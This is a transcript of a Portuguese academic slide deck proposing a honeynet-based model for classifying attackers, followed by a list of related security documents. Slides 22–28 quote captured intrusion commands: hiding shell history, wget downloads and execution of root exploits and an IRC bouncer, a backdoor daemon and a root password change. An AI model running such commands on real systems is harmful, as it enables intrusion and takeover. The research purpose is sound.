Um Modelo Alternativo Baseado em Honeynet para Identificação e Classificação de Atacantes. Alexandre Pinaffi Andrucioli

Tamanho: px
Começar a partir da página:

Download "Um Modelo Alternativo Baseado em Honeynet para Identificação e Classificação de Atacantes. Alexandre Pinaffi Andrucioli"

Transcrição

1 Um Modelo Alternativo Baseado em Honeynet para Identificação e Classificação de Atacantes Alexandre Pinaffi Andrucioli pinaffi@ravel.ufrj.br

2 Motivação Estudar os ataques gerados na Internet Entender os principais objetivos de um atacante Motivação Técnicas de ataque e invasão Passos realizados Identificar o perfil e risco de um atacante

3 Objetivos Construção de um ambiente para captura dos dados de ataque Análise dos ataques sofridos Estudo do modelo para identificação de atacantes, criado por Toby Miller Identificação de falhas no modelo original Proposta de soluções para as falhas identificadas Avaliação e comparação do modelos

4 Ambiente Construído Honeynet Honeypots com alto nível de envolvimento Serviços e sistemas reais Rede dedicada à captura de informações Diferentes sistemas operacionais Rede construída não é divulgada Dados capturados, em geral, pertencem a algum tipo de ataque

5 Ambiente Construído Honeynet (Geração I) Controle e captura de dados Honeynet (Geração II) Utilizada no trabalho Introduz novos conceitos para controle e captura Limite de conexões Utilização de IPS Bridges Controle de log outros

6 Ambiente Construído

7 Modelo Original Criado por Toby Miller Rating the Enemy: How to Identify the Enemy. Analisa 5 categorias de um ataque Sistema Operacional Reconhecimento Ataque Ferramentas Utilizadas Endereço IP de Destino

8 Modelo Original Classifica o atacante em relação ao nível de conhecimento e riscos apresentados: Script Kiddie Usuário Comum Usuário Médio Administrador de Sistemas Atacante Profissional

9 Modelo Original Apresenta algumas falhas ao analisar o ataque: Não considera ataques gerados a partir da máquina invadida Considera o SO destino ao atribuir pontuação Desconsidera a investigação da máquina após uma invasão Desconsidera a limpeza de logs na máquina invadida Desconsidera reconhecimentos por Banner e engenharia social

10 Modelo Original Desconsidera ataques de engenharia social (senhas roubadas) Desconsidera o uso de técnicas manuais Desconsidera o emprego de ferramentas pessoais Desconsidera o reconhecimento realizado por uma máquina diferente daquela que executa o ataque Outros

11 Modelo Alternativo Criado com o objetivo de contornar os problemas encontrados Acrescenta novos questionários e pontuação, em busca de dados mais precisos e coerentes ao ataque Mantém a estrutura básica do modelo original Cinco categorias analisadas Mantém a mesma classificação do atacante

12 Modelo Alternativo Classificação de Sistemas Operacionais S1 S2 S3 S S5 S6 S7 S8 ST Sistema Operacional Windows 9x ME Windows NT XP Solaris AIX MAC HP-UX Linux BSD Total da Categoria Pontuação (1 5)

13 Modelo Alternativo Classificação por tipo de Reconhecimento Tipo Pontuação R1 R2 R3 R R5 R6 R7 R8 SYN (<=0Bytes) SYN FIN X-mas tree SYN FIN TCP Connect RST UDP

14 Modelo Alternativo Classificação por tipo de Reconhecimento (Cont.) Tipo Pontuação R9 ICMP 2 R10 R11 R12 R13 R1 RT Banner Engenharia Social Outros Rec. De Múltiplas Máquinas/Portas Rec. realizado por diferente máquina Total da Categoria (0 6)

15 Modelo Alternativo Classificação de Ataques A1 A2 A3 A A5 A6 A7 A8 A9 A10 AT Tipo Ataque aplicável ao SO Novo ataque Ataque comum (conhecido) Ataque bem sucedido Ataque modificado Máquina mal configurada Ataque de Eng. Social Ataque de múltiplas máquinas Ataque de worm Não se tornou super-usuário Total da Categoria Pontuação Sim=3,Não= Não= (-1 23)

16 Modelo Alternativo Classificação de Ferramentas Utilizadas F1 F2 F3 F F5 F6 F7 F8 F9 F10 F11 FT Tipo Rootkit Binário LKM LKM avançado Rootkit Windows Rootkit bem sucedido Utilização de técnicas manuais Ferramentas pessoais Investigação da máquina invadida Limpeza de registros Proteção da máquina invadida Instalação de novos serviços Total da Categoria Pontuação Não= Sim=3,Não=-1 Sim=3,Não= (-2 25)

17 Modelo Alternativo Classificação para Endereço IP de Destino E1 E2 E3 E E5 E6 E7 Sistema Operacional Máquina ligada Sofre ataque (D)DoS Sofre ataque de pichamento Disponibilização de serviços Outros Computador sem dados críticos Informações Pessoais Documentos Pontuação 1 3 Sim=,Não=-1

18 Modelo Alternativo Classificação para Endereço IP de Destino (cont.) E8 E9 E10 Sistema Operacional Dados de cartão de crédito Informações bancárias Info. financeiras e pessoais Informações críticas Pontuação Sim=,Não=-1 Sim=,Não=-1 Sim=,Não=-1 E11 E12 E13 E1 Dados de interesse nacional Dados empresariais Informações de rede Máquina gera novos ataques Sim=8,Não=-1 Sim=6,Não=-1 Sim=,Não=-1

19 Modelo Alternativo Classificação para Endereço IP de Destino (cont.) E15 E16 E17 E18 E19 E20 E21 Sistema Operacional Gera ataques (D)DoS Gera ataque de pichamento Disponibilização de serviços Outros Computador sem dados críticos Informações Pessoais Documentos Dados de cartão de crédito Pontuação 3

20 Modelo Alternativo Classificação para Endereço IP de Destino (cont.) E22 E23 E2 E25 E26 ST Sistema Operacional Informações bancárias Info. financeiras e pessoais Informações críticas Dados de interesse nacional Dados empresariais Informações de rede Total da Categoria Pontuação 8 6 ( )

21 Modelo Alternativo Classificação de atacantes Pontuação Acima de 85 Classificação Script Kiddie Usuário Básico Usuário Médio Administrador de Sistemas Atacante Profissional

22 Análise de Ataque (1) Reconhecimento Sep 17 18:08:51 ravel Kernel: INBOUND TCP: IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth2 SRC=IPATAQUE DST=HONEYPOT5 LEN=60 TOS=0x00 PREC=0x00 TTL= ID=3103 DF PROTO=TCP SPT=3197 DPT=3 WINDOW=580 RES=0x00 SYN URGP=0 Invasão (CAN ) bash-2.05a$ unset HISTFILE; uname -a; id; w;uid=8(apache) gid=8(apache) groups=8(apache) Download e execução de um exploit: bash-2.05a$ wget bash-2.05a$ tar zxf rh73.tgz bash-2.05a$./rh73 [+] Attached to 068 [+] Signal caught [+] Shellcode placed at 0x000fd1d [+] Now wait for suid shell... unset HISTFILE

23 Análise de Ataque (1) Instalação de um IRC Bouncer wget geocities.com/bogdanul_16/linuz/psybnc.tgz tar zxf psybnc.tgz cd psybnc./psybnc.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.,----.,----.,-.,-.,---.,--.,-.,----. O,-' \ \/ / o \,--' _/ _\ \ \ / o< \ _ / _ \_ \ Version (c) the most psychoid and the cool lam3rz Group IRCnet

24 Análise de Ataque (1) Miller: 13 pontos - Usuário Básico SO: 3 (Linux->Linux) Reconhecimento: 3 pontos Ataque: 2 pontos Ferramentas Utilizadas: 0 pontos Endereço IP de destino: 5 pontos

25 Análise de Ataque (1) Modelo Alternativo: 23 pontos Script Kiddie SO: 5 pontos (S7) Reconhecimento: 2 pontos (R12-R13) Ataque: 9 pontos (A1+A3+A) Ferramentas Utilizadas: -2 pontos (-F8-F9) Endereço IP de destino: 9 pontos (E1+E+E6)

26 Reconhecimento Análise de Ataque (2) Sep 19 11:03:16 ravel Kernel: INBOUND TCP: IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth2 SRC=IPATAQUE1 DST=HONEYPOT5 LEN=52 TOS=0x00 PREC=0x00 TTL= ID=859 DF PROTO=TCP SPT=36327 DPT=3 WINDOW=580 RES=0x00 SYN URGP=0 Invasão (CAN ) bash-2.05a$ unset HISTFILE; uname -a; id; w;uid=8(apache) gid=8(apache) groups=8(apache) Download e execução de um serviço novo para realizar o login na máquina (é instalado um serviço como o telnet na porta 8081): bash-2.05a$ wget bash-2.05a$ chmod +x ssh bash-2.05a$./ssh Daemon is starting...ok, pid = 173

27 Análise de Ataque (2) Atacante volta pela porta 8081, se torna super-usuário, altera a senha de root da máquina e a vasculha: sh-2.05a$ wget sh-2.05a$ tar -xzvf p.tgz sh-2.05a$./p [+] Attached to 1761 [+] Signal caught [+] Shellcode placed at 0x000fd1d [+] Now wait for suid shell... sh-2.05a# sh-2.05a# passwd root sh-2.05a# cd /var/tmp sh-2.05a# ls...

28 Análise de Ataque (2) Atacante realiza o download de uma ferramenta e passa a gerar ataques [root\@fedora root]# wget [root\@fedora root]# tar -zxvf selena.tgz [root\@fedora root]#./assl Outras tentativas de ataque são realizadas, porém todas barradas pelo sistema de controle da Honeynet Ocorreram tentativas de download de outras ferramentas, porém sem sucesso

29 Análise de Ataque (2) Miller: 13 pontos - Usuário Básico SO: 3 (Linux->Linux) Reconhecimento: 3 pontos Ataque: 2 pontos Ferramentas Utilizadas: 0 pontos Endereço IP de destino: 5 pontos

30 Análise de Ataque (2) Modelo Alternativo: 30 pontos - Usuário Básico SO: 5 pontos (S7) Reconhecimento: 2 pontos (R12-R13) Ataque: 9 pontos (A1+A3+A) Ferramentas Utilizadas: pontos (+F8-F9+F11) Endereço IP de destino: 12 pontos (E1+E5+E6+E1)

31 Comparação entre os modelos O modelo criado por Miller pontua igualmente os dois ataques, apesar da grande diferença Desconsidera pontos importantes como ataques realizados através da máquina invadida O modelo alternativo demonstra mais coerência com os tipos de ataques sofridos Avalia todos os passos anteriores e posteriores a invasão

32 Comparação entre os modelos Considera ataques realizados pela máquina invadida Considera outras ações, como a troca de senhas Nos testes apresentados, assim como outros realizados, o modelo alternativo apresenta maior precisão a medida que o ataque se torna mais complexo Mantém uma classificação idêntica ao modelo em ataques muito simples

33 Conclusão O modelo alternativo atinge o objetivo esperado: Mantém os conceitos originais introduzidos por Miller Ataca os problemas levantados em relação ao modelo original Adiciona ao modelo novas avaliações Permite um análise mais detalhada do atacante, assim como a sua classificação

Honeypots e Honeynets: Contra-inteligência ncia no Ciberespaço

Honeypots e Honeynets: Contra-inteligência ncia no Ciberespaço Honeypots e Honeynets: Contra-inteligência ncia no Ciberespaço Time Honeynet.BR Apresentado por Dr.Antonio Montes - CenPRA/MCT Organizaçã ção Introduçã ção Honeypots e Honeynets Honeynet.BR Resultados

Leia mais

Firewalls em Linux. Tutorial Básico. André Luiz Rodrigues Ferreira alrferreira@carol.com.br

Firewalls em Linux. Tutorial Básico. André Luiz Rodrigues Ferreira alrferreira@carol.com.br Firewalls em Linux Tutorial Básico André Luiz Rodrigues Ferreira alrferreira@carol.com.br 1 O que é um Firewall? Uma série de mecanismos de proteção dos recursos de uma rede privada de outras redes. Ferramenta

Leia mais

Introdução à Forense Computacional. Henrique Ribeiro henrique@gris.dcc.ufrj.br

Introdução à Forense Computacional. Henrique Ribeiro henrique@gris.dcc.ufrj.br Introdução à Forense Computacional Henrique Ribeiro henrique@gris.dcc.ufrj.br Definição Coleta e análise de dados de maneira não tendenciosa e o mais livre de distorção possível, para reconstruir dados

Leia mais

Tratamento de Incidentes. em Função de alguns Ataques Atuais na Internet-BR

Tratamento de Incidentes. em Função de alguns Ataques Atuais na Internet-BR Tratamento de Incidentes Recomendações de Segurança em Função de alguns Ataques Atuais na Internet-BR NIC Br Security Office http://www.nic.br/nbso.html Cristine Hoepers

Leia mais

Hands-on: Implantação de monitoramento por Sflow

Hands-on: Implantação de monitoramento por Sflow Hands-on: Implantação de monitoramento por Sflow Encontro de CSIRTs Acadêmicos RNP / PoP-BA / UFBA Italo Valcy 05 e 06 de dezembro de 2018 Créditos O material aqui apresentado foi

Leia mais

10 anos de rootkits. Nelson Murilo

10 anos de rootkits. Nelson Murilo 10 anos de rootkits Nelson Murilo Rootkit Definição Código ou conjunto de códigos usados, após uma invasão, para ocultar a presença do invasor na máquina da vítima Rootkit histórico

Leia mais

Julho/2004. João Bosco M. Sobral

Julho/2004. João Bosco M. Sobral Negação de Serviço Vazamento de Informações Acesso a arquivos comuns Informação Falsa Acesso a arquivos ou bancos de dados especiais Execução remota de código arbitrário Elevação de Privilégios Quando

Leia mais

Segurança Informática e nas Organizações. Guiões das Aulas Práticas

Segurança Informática e nas Organizações. Guiões das Aulas Práticas Segurança Informática e nas Organizações Guiões das Aulas Práticas André Zúquete 1 e Hélder Gomes 2 1 Departamento de Eletrónica, Telecomunicações e Informática 2 Escola Superior de Tecnologia e Gestão

Leia mais

HoneyPot e HoneyNet. Reginaldo Campos Segurança em Redes de Computadores

HoneyPot e HoneyNet. Reginaldo Campos Segurança em Redes de Computadores HoneyPot e HoneyNet Reginaldo Campos Segurança em Redes de Computadores Motivação Para se defender do inimigo, primeiro é preciso conhecê-lo, ou seja, conhecer seus métodos de ataque, suas ferramentas,

Leia mais

Instalação do IBM SPSS Modeler Entity Analytics

Instalação do IBM SPSS Modeler Entity Analytics Instalação do IBM SPSS Modeler Entity Analytics Índice IBM SPSS Modeler Entity Analytics Instalação.............. 1 IBM SPSS Modeler Entity Analytics (Lado do Cliente) 1 Requisitos de sistema..........

Leia mais

Gestão de Sistemas e Redes

Gestão de Sistemas e Redes Gestão de Sistemas e Redes Firewalls Paulo Coelho 2005 Versão 1.0 1 Acessos do exterior A ligação da rede de uma empresa a um sistema aberto como a Internet merece muitíssimo cuidado Três preocupações

Leia mais

PROPOSTA E AVALIAÇÃO DE UM MODELO ALTERNATIVO BASEADO EM HONEYNET PARA IDENTIFICAÇÃO DE ATAQUES E CLASSIFICAÇÃO DE ATACANTES NA INTERNET

PROPOSTA E AVALIAÇÃO DE UM MODELO ALTERNATIVO BASEADO EM HONEYNET PARA IDENTIFICAÇÃO DE ATAQUES E CLASSIFICAÇÃO DE ATACANTES NA INTERNET PROPOSTA E AVALIAÇÃO DE UM MODELO ALTERNATIVO BASEADO EM HONEYNET PARA IDENTIFICAÇÃO DE ATAQUES E CLASSIFICAÇÃO DE ATACANTES NA INTERNET Alexandre Pina Andrucioli TESE SUBMETIDA AO CORPO DOCENTE DA COORDENAÇÃO

Leia mais

Um Agente SNMP para Detecção de Intrusão Baseada na Interação de Protocolos

Um Agente SNMP para Detecção de Intrusão Baseada na Interação de Protocolos Um Agente SNMP para Detecção de Intrusão Baseada na Interação de Protocolos Edgar Meneghetti (UFRGS) Luciano Paschoal Gaspary (UNISINOS) Liane Tarouco (UFRGS) 20 o Simpósio Brasileiro de Redes de Computadores

Leia mais

Levantamento de informação (Fingerprint)

Levantamento de informação (Fingerprint) Levantamento de informação (Fingerprint) Continuação... Prof. Pedro Filho Objetivos Mapear hosts ativos na rede Obter versões dos sistemas operacionais Entender aquisição de banners Identificar os serviços

Leia mais

Apresentação, Metodologia. NBSO NIC Br Security Office

Apresentação, Metodologia. NBSO NIC Br Security Office Apresentação, Metodologia e Recomendações do NBSO NIC Br Security Office Cristine Hoepers Klaus Steding-Jessen SSI 99 Simpósio Segurança em Informática São José dos Campos

Leia mais

Ataque em Sistemas Distribuídos Site :

Ataque em Sistemas Distribuídos Site : Faculdade de Engenharia da Computação Disciplina: Segurança Aplicada à Computação Ataque em Sistemas Distribuídos Site : http://www1.univap.br/~wagner/ec.html / / h Prof. Responsáveis Wagner Santos C.

Leia mais

Nota de Aplicação NA#10. Instalando driver USB para comunicação com no-breaks Engetron.

Nota de Aplicação NA#10. Instalando driver USB para comunicação com no-breaks Engetron. Nota de Aplicação Instalando driver USB para comunicação com no-breaks Engetron NA#10 Engetron Engenharia Eletrônica Ind. e Com. Ltda Atendimento ao consumidor: (31) 3359-5800 www.engetron.com.br 2008,

Leia mais

Sistema Operacional. Disciplina: Softwares, Aplicativos e Sistema Operacional. Professor: Thiago Silva Prates

Sistema Operacional. Disciplina: Softwares, Aplicativos e Sistema Operacional. Professor: Thiago Silva Prates Sistema Operacional Disciplina: Softwares, Aplicativos e Sistema Operacional Professor: Thiago Silva Prates Software e aplicativos Software é uma sequência de instruções à serem seguidas e executadas.

Leia mais

Configuração da recusa de técnicas de prevenção do serviço (série da Segurança) em switch empilhável do Sx500 Series

Configuração da recusa de técnicas de prevenção do serviço (série da Segurança) em switch empilhável do Sx500 Series Configuração da recusa de técnicas de prevenção do serviço (série da Segurança) em switch empilhável do Sx500 Series Objetivo A recusa de serviço (DoS) ou a recusa distribuída de ataques do serviço (DDoS)

Leia mais

Tecnologias e Sistemas de Informação. Software Livre. SL: Gerenciamento e Configurações 2 Semestre de Prof. Marcelo Z.

Tecnologias e Sistemas de Informação. Software Livre. SL: Gerenciamento e Configurações 2 Semestre de Prof. Marcelo Z. Tecnologias e Sistemas de Informação Software Livre SL: Gerenciamento e Configurações 2 Semestre de 2010 Prof. Marcelo Z. do Nascimento Roteiro Gerenciamento de Grupos e Usuários Comandos para gerenciamento

Leia mais

Nimbus - Configuração de um Servidor de Backup

Nimbus - Configuração de um Servidor de Backup Nimbus - Configuração de um Servidor de Backup Date : 18 de Abril de 2013 Nimbus é uma distribuição brasileira de linux com um servidor de backups opensource parcialmente configurado e tendo como parte

Leia mais

Instrução de Trabalho: Instalar Client

Instrução de Trabalho: Instalar Client Instrução de Trabalho Instrução de Trabalho: Instalar Client 1. Objetivos Estabelecer procedimento para a atividade Instalar client. 2. Definições 3. Aplicação Aplicável á todos os envolvidos na Implantação

Leia mais

MANUAL DE INSTALAÇÃO

MANUAL DE INSTALAÇÃO MANUAL DE INSTALAÇÃO 1 SUMÁRIO REQUISITOS MÍNIMOS... 3 INSTALAÇÃO A PARTIR DO ARQUIVO RPM...4 Download do Arquivo...4 Instalação pela linha de comando...4 Regras de Firewall...4 Acessando o Monsta...5

Leia mais

474QU35 J1y4n y4r

474QU35 J1y4n y4r J1y4n y4r1 0000 0001 71P05 D3 0000 0011 FOOTPRINTING TAREFA DE COLETAR INFORMAÇÕES SOBRE UM SISTEMA ALVO; - FEITA POR VIAS TRADICIONAIS E PÚBLICAS, COMO USO DO FINGER, LEITURA DE PÁGINAS DO SITE PARA OBTER

Leia mais

Honeypots - A segurança através do disfarce

Honeypots - A segurança através do disfarce Honeypots - A segurança através do disfarce Tiago Souza Azevedo (tiago@ravel.ufrj.br) Ravel - COPPE/UFRJ GRIS - DCC/UFRJ 9 de Agosto de 2005 Resumo Este artigo foi desenvolvido como fruto do estudo de

Leia mais

O GUI falha quando um arquivo é transferido ou exportado através do DCM

O GUI falha quando um arquivo é transferido ou exportado através do DCM O GUI falha quando um arquivo é transferido ou exportado através do DCM Índice Introdução Problema: O GUI falha quando um arquivo é transferido ou exportado através do DCM Solução Introdução Este original

Leia mais

8 o Projecto: Autenticação com S/Key

8 o Projecto: Autenticação com S/Key Segurança Informática e nas Organizações 2011-12 8 o Projecto: Autenticação com S/Key V 1.0 1 Introdução Com este trabalho pretende-se estudar a configuração e exploração de autenticação com senhas descartáveis

Leia mais

10. mkdir [pasta1] [pasta2] (cria pasta1 e pasta dois ao mesmo tempo) Exemplo: $ mkdir teste1 teste2

10. mkdir [pasta1] [pasta2] (cria pasta1 e pasta dois ao mesmo tempo) Exemplo: $ mkdir teste1 teste2 Principais Comandos do Terminal no LINUX Estes comandos não visam ser um compêndio completo de operação, haja vista que se possui mais comandos que esses aqui que serão listados, logo os comandos são:

Leia mais

SHELL. Alberto Felipe Friderichs Barros

SHELL. Alberto Felipe Friderichs Barros SHELL Alberto Felipe Friderichs Barros Introdução Os três componentes principais de um sistema operacional são o kernel, o shell e o sistema de arquivos. Shell A tradução de Shell para português neste

Leia mais

Ataques e Intrusões. Invasões Trashing e Engenharia Social. Classificação de Hackers

Ataques e Intrusões. Invasões Trashing e Engenharia Social. Classificação de Hackers Ataques e Intrusões Professor André Cardia andre@andrecardia.pro.br msn: andre.cardia@gmail.com Ataques e Intrusões O termo genérico para quem realiza um ataque é Hacker. Essa generalização, tem, porém,

Leia mais

monsta Manual de Instalação

monsta Manual de Instalação monsta Manual de Instalação 1 Índice Requisitos Mínimos...3 Instalação a partir do arquivo RPM...4 Instalação do Monsta...4 Regras de Firewall...4 E-mails de alerta...4 Instalação a partir do download

Leia mais

MANUAL DE INSTALAÇÃO SISTEMA DE GERÊNCIA CONSCIUS

MANUAL DE INSTALAÇÃO SISTEMA DE GERÊNCIA CONSCIUS MANUAL DE INSTALAÇÃO SISTEMA DE GERÊNCIA CONSCIUS 1 ÍNDICE ÍNDICE... 2 1. INTRODUÇÃO... 3 2. REQUISITOS... 3 2.1 Requisitos mínimos para utilização do instalador... 3 2.2 Requisitos mínimos para instalação

Leia mais

INTRODUÇÃO. Henry Equipamentos e Sistemas Ltda.

INTRODUÇÃO. Henry Equipamentos e Sistemas Ltda. INTRODUÇÃO Este manual tem como objetivo explicar a utilização do software embarcado do equipamento Ponto E Advanced. De fácil utilização e com suporte a navegadores de internet de todos os sistemas operacionais,

Leia mais

Gerência de Redes de Computadores Zabbix Instalação. Prof. Alex Furtunato

Gerência de Redes de Computadores Zabbix Instalação. Prof. Alex Furtunato Gerência de Redes de Computadores Zabbix Instalação Prof. Alex Furtunato alex.furtunato@ifrn.edu.br Introdução Sistema de monitoramento de rede enterprise open source, com solução de monitoramento distribuído

Leia mais

A História de Um Ataque

A História de Um Ataque A História de Um Ataque Avi Alkalay avix@br.ibm.com Consultor de Linux, Software Livre, Padrões Abertos e Segurança na IBM Brasil Qualquer administrador de firewall pode observar em seus logs que uma máquina

Leia mais

Objetivos Instalação Gerência de Pacotes UNIX Shell. Curso UNIX. Matheus Braun Magrin Felipe dos Santos Silveira

Objetivos Instalação Gerência de Pacotes UNIX Shell. Curso UNIX. Matheus Braun Magrin Felipe dos Santos Silveira Curso UNIX Matheus Braun Magrin Felipe dos Santos Silveira Universidade Federal de Santa Catarina 25 de Setembro de 2010 CHAMADA Objetivos Instalação do sistema Ubuntu 10.04 Conhecer a origem do sistema

Leia mais

André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães

André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães O Nmap é um portscan de uso geral; O Nmap está disponível em todas as principais distribuições; O uso mais simples é escanear

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores Shell Gustavo Reis gustavo.reis@ifsudestemg.edu.br 1 Interpretador de comandos Interpreta as instruções enviadas pelo usuário e seus programas ao sistema operacional (kernel) Executa

Leia mais

Segurança e Auditoria. Auditoria Coleta de dados, Análise de dados, Auditoria preventiva. de Sistemas

Segurança e Auditoria. Auditoria Coleta de dados, Análise de dados, Auditoria preventiva. de Sistemas Segurança e Auditoria Auditoria Coleta de dados, Análise de dados, Auditoria preventiva de Sistemas Auditoria Auditaria: Coleta Análise recolher dados sobre o funcionamento de um sistema ou aplicação e

Leia mais

Acesso Re sso R moto

Acesso Re sso R moto Acesso Remoto Introdução Em um ambiente de rede, é sempre importante salientar o uso de ferramentas que possam facilitar procedimentos de manutenção, gerenciamento e execução de procedimentos em uma determinada

Leia mais

Firewall - Inspeção com estado. (Stateful Inspection)

Firewall - Inspeção com estado. (Stateful Inspection) Proxy e FIREWALL Firewall - Inspeção com estado. (Stateful Inspection) As primeiras gerações de firewall eram ditos "stateless". Cada pacote é analisado individualmente, sem levar em conta pacotes anteriores

Leia mais

Trabalho Prático Nº 3

Trabalho Prático Nº 3 Redes de Computadores Escola Superior de Tecnologia e de Gestão Instituto Politécnico de Bragança Engenharia Informática, Engenharia Electrotécnica e Informática de Gestão Trabalho Prático Nº 3 Objectivos:

Leia mais

Honeypots, honeynets e honeytokens

Honeypots, honeynets e honeytokens Santo André, 07 de Agosto de 2013 Programa de Mestrado em Engenharia da Informação Honeypots, honeynets e honeytokens Iva n Riboldi J ordão da Silva Va rgas Currículo Ivan Riboldi Jordão da Silva Vargas

Leia mais

4 o Fórum Brasileiro de CSIRTs 17 e 18 de setembro de 2015 São Paulo, SP

4 o Fórum Brasileiro de CSIRTs 17 e 18 de setembro de 2015 São Paulo, SP 4 o Fórum Brasileiro de CSIRTs 17 e 18 de setembro de 2015 São Paulo, SP Uso de Flows no Tratamento de Incidentes - Estudo de Caso do CSIRT Unicamp Daniela Barbetti daniela@unicamp.br Agenda: CSIRT Unicamp

Leia mais

Tutorial para Instalação do dotproject

Tutorial para Instalação do dotproject Tutorial para Instalação do dotproject O objetivo deste tutorial é apresentar o processo de instalação do dotproject. Também serão abordadas informações sobre a instalação do pacote de tradução e possíveis

Leia mais

DESCRIÇÃO E JUSTIFICATIVAS TECNICAS SOBRE A INFLUÊNCIA DO SISTEMA OPERACIONAL NA SEGURANÇA DOS SERVIÇOS IPS

DESCRIÇÃO E JUSTIFICATIVAS TECNICAS SOBRE A INFLUÊNCIA DO SISTEMA OPERACIONAL NA SEGURANÇA DOS SERVIÇOS IPS DESCRIÇÃO E JUSTIFICATIVAS TECNICAS SOBRE A INFLUÊNCIA DO SISTEMA OPERACIONAL NA SEGURANÇA DOS SERVIÇOS IPS 1. Introdução O crescimento e a quantidade de recursos disponíveis na Internet tem chamado a

Leia mais

PIkit : A New Kernel-Independent Processor-Interconnect Rootkit

PIkit : A New Kernel-Independent Processor-Interconnect Rootkit PIkit : A New Kernel-Independent Processor-Interconnect Rootkit Autores do artigo: Wonjun Song, Hyunwoo Choi, Junhong Kim, Eunsoo Kim, Yongdae Kim, John Kim Apresentação: Vagner Kaefer Dos Santos Introdução

Leia mais

Roteiro de Práticas de Roteamento EGP usando Quagga

Roteiro de Práticas de Roteamento EGP usando Quagga Roteiro de Práticas de Roteamento EGP usando Quagga BGP O objetivo desse roteiro é mostrar como o pacote Quagga pode ser utilizado para construir roteadores com suporte a protocolos de roteamento utilizando

Leia mais

NOÇÕES DE INFORMÁTICA. Segurança da Informação Pragas Virtuais Parte 1 Prof. Flávio Lima

NOÇÕES DE INFORMÁTICA. Segurança da Informação Pragas Virtuais Parte 1 Prof. Flávio Lima NOÇÕES DE INFORMÁTICA Segurança da Informação Pragas Virtuais Parte 1 Prof. Flávio Lima Código malicioso ou Malware (Malicious Software) é um termo genérico que abrange todos os tipos de programa especificamente

Leia mais

Número do documento: 214 Classificação: Não avaliado Última atualização: Tue, May 9, :44 AM

Número do documento: 214 Classificação: Não avaliado Última atualização: Tue, May 9, :44 AM Como instalar o PostgreSQL? Número do documento: 214 Classificação: Não avaliado Última atualização: Tue, May 9, 2017 7:44 AM O que é? O PostgreSQL é um poderoso sistema gerenciador de banco de dados objeto-relacional

Leia mais

Firewalls Reginaldo Campos 1

Firewalls Reginaldo Campos 1 Firewalls Reginaldo Campos 1 Roteiro Introdução Características do Firewall Tipo de Firewall Filtro de Pacotes Servidores Proxy Tipos avançados de Firewall Bastion Host Firewalls híbridos 2 Roteiro (cont)

Leia mais

Sistemas de Detecção de Intrusão

Sistemas de Detecção de Intrusão Sistemas de Detecção de Intrusão Gabriel Antonio Fontes Rebello Matheus Lemos dos Reis Rafael Gonçalves Damasceno Raphael Oliveira Sathler de Souza Rodrigo Carvalho Ribeiro de Jesus Contexto para Sistemas

Leia mais

Gerenciamento de Arquivos

Gerenciamento de Arquivos Curso de extensão da Faculdade Ruy Barbosa Introdução a Administração de Sistemas GNU/Linux Dedicasse especial a Rogério Bastos e ao GRACO (Gestores da Rede Acadêmica de Computação) do DCC UFBA Paul Regnier

Leia mais

INTRODUÇÃO. Henry Equipamentos e Sistemas Ltda.

INTRODUÇÃO. Henry Equipamentos e Sistemas Ltda. INTRODUÇÃO Este manual tem como objetivo explicar a utilização do software embarcado do equipamento Hexa Advanced. De fácil utilização e com suporte a navegadores de internet de todos os sistemas operacionais,

Leia mais

Autenticação do proxy de autenticação de partida - Nenhuma Cisco IOS Firewall ou configuração de NAT

Autenticação do proxy de autenticação de partida - Nenhuma Cisco IOS Firewall ou configuração de NAT Autenticação do proxy de autenticação de partida - Nenhuma Cisco IOS Firewall ou configuração de NAT Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Convenções Configurar Diagrama de

Leia mais

Comandos Básicos Sistema Operacional GNU Linux

Comandos Básicos Sistema Operacional GNU Linux Básicos Sistema Operacional GNU Linux Leonardo Cabral da Rocha Soares 4 de junho de 2018 Leonardo Soares Linux 4 de junho de 2018 1 / 7 Conteúdo 1 Introdução 2 Acessando o servidor remoto 3 Miscelânea

Leia mais

Introdução a Sistemas Abertos. Ambiente shell

Introdução a Sistemas Abertos. Ambiente shell Introdução a Sistemas Abertos Ambiente shell Conteúdo Programático Login e Logout Iniciando e Desligando o Sistema Tipos de arquivo Texto Binário Arquivos e Diretório Manipulação de arquivos e diretório

Leia mais

Formação em Segurança Cibernética. Sessão 4 Explorando vulnerabilidades em redes

Formação em Segurança Cibernética. Sessão 4 Explorando vulnerabilidades em redes Formação em Segurança Cibernética Sessão 4 Explorando vulnerabilidades em redes Levantamento de Vulnerabilidades Ferramentas - HPING A ferramenta HPING é um gerador e analisador de pacotes TCP/IP muito

Leia mais

Ataques para obtenção de informações

Ataques para obtenção de informações Ataques para obtenção de informações Técnicas: Dumpster diving ou Trashing Engenharia Social Eavesdropping ou Packet Sniffing Scanning War dialing Firewalking Ataques para obtenção de informações Dumpster

Leia mais

MANUAL DE INSTALAÇÃO

MANUAL DE INSTALAÇÃO MANUAL DE INSTALAÇÃO 1 SUMÁRIO INSTALAÇÃO A PARTIR DO ARQUIVO RPM...3 Passo 1: Requisitos mínimos...3 Passo 2 (opcional): Configurando a rede no CentOS...3 Passo 3: Download do Arquivo...5 Passo 4: Instalação...5

Leia mais

PROCESSO DE SELEÇÃO DE ESTAGIÁRIO EDITAL 100/2017

PROCESSO DE SELEÇÃO DE ESTAGIÁRIO EDITAL 100/2017 PROCESSO DE SELEÇÃO DE ESTAGIÁRIO EDITAL 100/2017 CADERNO DE QUESTÕES Nome e assinatura do candidato ************************* INSTRUÇÕES ************************** Este caderno possui 12 (doze) questões,

Leia mais

Comandos de arquivos

Comandos de arquivos Comandos de arquivos ls lista diretórios ls -al lista mostrando também arquivos ocultos cd dir muda do diretório atual para o especificado (substituir a variável dir pelo nome da pasta) cd muda para o

Leia mais

Lab 4 Análise de Pacotes utilizando o TCPDUMP

Lab 4 Análise de Pacotes utilizando o TCPDUMP Objetivo: Lab 4 Análise de Pacotes utilizando o TCPDUMP i) Utilizar aplicativo de análise de pacotes TCPDUMP. TCPDUMP: O tcpdump é um programa cuja utilidade principal é visualizar e analisar o tráfego

Leia mais

Alunos em técnico em Informática da EAFS: Leandro Cavalari, Maria Matos e Renata Rasche.

